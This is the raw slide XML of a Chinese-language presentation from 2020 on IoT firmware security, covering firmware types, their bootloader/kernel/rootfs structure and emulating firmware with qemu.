        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>谢谢观看</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="2486660"/>
            <a:ext cx="4215130" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thanks for watching</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="3663950"/>
            <a:ext cx="1681480" cy="229870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2020.08/H4lo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>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74" y="397924"/>
            <a:ext cx="1283211" cy="499873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="PPT调整"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492625" y="-1270"/>
            <a:ext cx="4651375" cy="515112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固件安全概述</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固件的分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="6163945" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>根据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备类型的不同，硬件驱动的固件类型也存在差异，主要可以分为几种类型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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通用型操作系统固件。采用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内核、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>风格文件系统，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由器、智能摄像头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</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实时操作系统固件。 VxWorks 和 FreeRTOS 等，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由器、智能门锁</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无操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>裸机固件。内核和操作系统，类似单片机程序。如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wifi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>放大器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7959725" y="2249805"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041640" y="3698240"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2728595" y="1010920"/>
            <a:ext cx="5210810" cy="1782445"/>
            <a:chOff x="4297" y="1592"/>
            <a:chExt cx="8206" cy="2807"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4297" y="1592"/>
              <a:ext cx="8206" cy="1132"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="图片 12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="21180000">
              <a:off x="6223" y="2899"/>
              <a:ext cx="1500" cy="1500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1229995" y="437515"/>
            <a:ext cx="7126605" cy="4419600"/>
            <a:chOff x="1919" y="689"/>
            <a:chExt cx="11223" cy="6960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3924" y="689"/>
              <a:ext cx="9218" cy="6961"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="2760000">
              <a:off x="1919" y="3543"/>
              <a:ext cx="1500" cy="1500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="437515"/>
            <a:ext cx="8188325" cy="4184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固件安全概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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固件的结构特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="5825490" cy="36830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IOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备固件一般由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bootloader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rootfs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>几部分组成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图片3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508625" y="1637030"/>
            <a:ext cx="3623945" cy="3252470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888865" y="1844040"/>
            <a:ext cx="1086485" cy="2581910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211455" y="2858135"/>
            <a:ext cx="5763895" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在嵌入式设备中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bootloader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常也叫做 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>uboot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03192" y="725907"/>
            <a:ext cx="4215130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固件模拟概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备固件属于嵌入式固件的一种，无法直接运行在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>架构上。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>需要借助一些模拟器来进行模拟，一般选择 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qemu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模拟器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图片1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698615" y="2590165"/>
            <a:ext cx="2165985" cy="2066290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="741045" y="3287395"/>
            <a:ext cx="5665470" cy="812800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603192" y="1300065"/>
            <a:ext cx="4215130" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固件模拟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.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2.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5551</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>497</Paragraphs>
  <Slides>61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61</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="72" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</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zhongwenjie</cp:lastModifiedBy>
  <cp:revision>825</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-24T04:03:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-24T04:03:46Z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